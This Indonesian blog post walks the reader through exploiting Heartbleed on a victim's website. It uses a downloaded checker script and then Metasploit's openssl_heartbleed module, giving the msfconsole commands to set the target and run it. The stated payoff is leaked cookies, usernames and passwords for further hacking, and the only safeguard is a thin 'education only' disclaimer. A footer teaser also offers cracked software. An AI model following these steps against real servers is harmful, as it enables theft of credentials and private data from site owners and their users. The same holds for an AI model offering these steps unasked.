Skip to main content

POC HeartBleed With MetasploitFrameWork

Author
peretasan sebuah website adalah salah satu kegemaran para hacker ataupun cracker, tujuannya apa?. banyak hal yang melatar belakangi seorang hacker melakukan peretasan. beberapa diantaranya adalah mendapatkan uang, karna sebuah gengsi, kesenangan pribadi dan atau pekerjaan. peretasan di definisikan sebagai cara atau kegiatan yang di lakukan untuk menyusupi suatu tempat (server) dari kesalahan sistem yang terdapat pada website. cara dan konsep dari peretasan website sangat banyak sekali, tergantung exploit atau bug yang ada pada website tersebut, contohnya yang paling umum dan sering di gunakan adalah Sql Injection, XSS, LFI, RFI, Temper Data. Semua cara tersebut sangat banyak terdapat di web dan blog-blog umum. bug tersebut juga masih ada website-website walaupun sudah lama. tapi kali ini saya tidak akan membahas salah satu dari beberapa teknik peretasan tersebut. beberapa waktu lalu, FBI di kagetkan oleh sebuah exploit yang memanfaatkan bug openSSL server namanya adalah HeartBleed, OpenSSL adalah Sebuah Protocol silahkan lihat definisi OpenSSL. banyak server yang menggunakan protocol Openssl terdapat bug ini, termasuk server Gmail.com . wow, bisa di bayangkan server perusahaan sebesar google, bisa di exploit dengan terdapatnya bug tersebut, tak heran serluruh perusahaan terkenal dan instansi kepemerintahan segera melakukan patch terhadap bug tersebut. tapi tidak semua server telah di patch, bug ini masih baru, dan masih banyak sekali server yang vulnerabel terhadap bug ini.

pada kali ini saya akan memberikan langkah-langkah POC (Proof Of Concept ) dari Exploit HeartBleed menggunakan Metasploit Frame Work, segera saja masuk langkah-langkahnya :


1. Cari website yang mau di periksa , apakah terdapat bug openssl nya.
gunakan file python berikut untuk memeriksanya. download filenya HeartBleed2.PY
2. Buka Terminal ctrl+alt+T ,Lihat IP website korban, ketik ping www.target.com , ternyata ketemu ipnya 127.0.0.1 (localhost)
3.  Masuk ke direktory dimana file heartbleed2.py .
Pada contoh berikut, file heartbleed.py saya simpan di direktory ~/Desktop/Hacking

Ketik cd ~/Desktop/Hacking lalu enter

3. ketik python heartbleed2.py 127.0.0.1
NB : - 127.0.0.1 hanya contoh, saya menyembunyikan link dan ip asli korban.
- warna merah adalah alamat website
- warna lime adalah ip website 


4. Dapat di lihat pada gambar di atas, terdapat kalimat ( WARNING: server returned more data than it should - server is vulnerable! )
kalimat tersebut menandakan bahwa server ternyata vulnerable terhadap bug openssl. setelah tau ternyata server vulnerable, slanjutnya kita buka MSFCONSOLE. 


5. ketik search heartbleed ,tunggu sampai library heartbleed kluar, apabila tidak ada. berarti MetasploitFrameWork anda masih belum uptodate. lebih baik di update dulu ketik msfupdate , tunggu hingga update selesai. dan lakukan mulai langkah 4.
apabila sudah terupdate, library heartbleed akan terlihat. seperti pada gambar di bawah ini. 






6. Pilih auxiliary/scanner/ssl/openssl_heartbleed , ketik use auxiliary/scanner/ssl/openssl_heartblee lalu Enter.

7. setelah itu ketik show options  untuk melihat apa saja value yang perlu di rubah.


8. dapat di lihat pada gambar di atas terdapat beberapa opsi, ada beberapa yang harus di ganti. yaitu RHOSTS dan verbose nya.
ketik set RHOSTS 127.0.0.1 
NB : ganti 127.0.0.1 dengan IP sesuai IP target yang anda dapat .
lalu ketik set verbose true 
9. setelah semua di set, sekarang waktunya eksekusi.

ketik run untuk menjalankan exploitnya.


10. apabila berhasil , anda akan di hadapkan pada code2 seperti cookie, user agent, dan user n password kalau kalian beruntung. inti dari exploit heartbleed adalah kalian akan mendapati pesan-pesan sensitif atau pribadi yang ada dalam server, yang bisa kalian gunakan untuk melakukan tindak hacking selanjutnya.

Sekian artikel saya, Semoga Bermanfaat.

Stay fools to Stay Hungry

NB : Artikel ini di peruntukkan untuk pendidikan semata. hal-hal negatif yang di lakukan oleh pengguna tutorial , bukan tanggung jawab penulis.



Malang, Malang City, East Java, Indonesia

Popular posts from this blog

The Advantage of Using HTTP Default Authorization Scheme #DigitalSecurity

Author Bill Tanthowi Jauhari
pixabay.com Hello Everyone, This day I would like to introduce you to the default header for authorization in HTTP. HTTP auth scheme is a guide or standardization scheme for the authorization header in the HTTP protocol. this standard is using key Authorization in the header and followed by a value that usually filled by key or token. for example : Authorization : <type> <key/token> this standard is the solution of the key header for authorization that really random was provided by developers to build an authorization header for their application, in my experience, developers used to "token" for their key in the header that usually followed by the hash value. the random key makes developers using more time for writing code for getting header key and validating the value which is you could use the library and focus on writing the logic of your application. Depend on Mozilla site , HTTP auth scheme divided by 4 types, such as : Basic  (see  RF
Read More »

Typer shark Deluxe free full crack

Author
Typer shark Deluxe : software yang akan membantu kita untuk belajar mengetik keyboard dengan cara 10jari, untuk agan2 yang baru belajar komputer pasti teknik pertama yang dilakukan adalah dengan 11jari (kanan 1 + kiri 1 = 11)hahahaha, softaware ini sangat menarik, karna kita belajar 10jari dengan bermain game.. n gamenya interaktif,,, pkoqnya yang tadinya mengetik 11jari, dalam waktu seminggu pasti bisa lancar 10jari... syaratnya harus tekunn...  kalo agan mau ngunduh silahkan : Download screenshot:
Read More »

Automatic API Documentation Swagger in Golang #GolangDev

Author Bill Tanthowi Jauhari
pixabay.com In this article, I'll explain how to generate an API blueprint instantly using SwagGo in Golang. API blueprint is a document that contains a bunch of API endpoints, its slickly same as documentation but less description, it's allow another programmer to read and see all the available endpoint and try it out with sandbox feature. Swagger is one of the most used API blueprints right now, it's available in free but limited usage. if you wanna use the free credit, you need to understand YAML notation, you can read the example notation in swagger official documentation. but again, it's really hard and takes an expensive time to arranges all the notation to achieve a good API blueprint. fortunately, there are tools in Golang that allow us to generate the YAML notation and automatically generate the blueprint page with only using markup notation, and it's FREE unlimited for self-host, insane right? SwagGo tools are available here , the documentation is very cl
Read More »